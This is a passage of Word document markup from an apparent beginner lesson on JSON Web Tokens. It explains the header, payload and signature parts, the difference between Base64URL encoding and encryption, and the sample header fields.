    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">The Three Parts of a JWT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A JWT is not just a random string. It has a very precise structure: three parts separated by dots.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200"/>
        <w:gridCol w:w="2920"/>
        <w:gridCol w:w="200"/>
        <w:gridCol w:w="3080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0A2744" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4FC3F7"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HEADER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2920"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0F2010" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A5D6A7"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PAYLOAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3080"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1A1000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC80"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SIGNATURE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0A2744" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B3E5FC"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">eyJhbGciOiJIUzI1NiJ9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2920"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0F2010" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C8E6C9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">eyJ1c2VySWQiOjEwMX0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3080"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1A1000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE0B2"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SflKxwRJSMeKKF2QT4fw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Each part is independently encoded in Base64URL format. Base64URL is just a way to safely represent binary data as text characters. It is NOT encryption — anyone can decode it.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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 05 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click the blue HEADER section — read the JSON that appears below it.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click the yellow PAYLOAD section — read what is inside.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click the green SIGNATURE section — notice it looks different (it is a hash, not JSON).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ask yourself: what is the purpose of each part?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1: The Header — What Type and Algorithm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The header is a small JSON object that describes the token itself. It tells the server how to verify the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E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">{</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  "alg": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"HS256"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">,   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">// Algorithm used to sign this token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  "typ": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"JWT"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">// Token type — always 'JWT'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">// After encoding: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9</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0022" w:sz="4"/>
              <w:left w:val="single" w:color="CC0022" w:sz="24"/>
              <w:bottom w:val="single" w:color="CC0022" w:sz="4"/>
              <w:right w:val="single" w:color="CC0022" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Header is NOT Secret</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The header is encoded with Base64URL — this is NOT encryption. It is just a different way to write the same text.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Anyone can decode it: try pasting a JWT at jwt.io and you will see the header instantly.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Never put sensitive information in the header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A05C00"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2: The Payload — Who Are You and What Can You Do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload contains claims — statements about the user. Claims are key-value pairs encoded as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E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">{</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
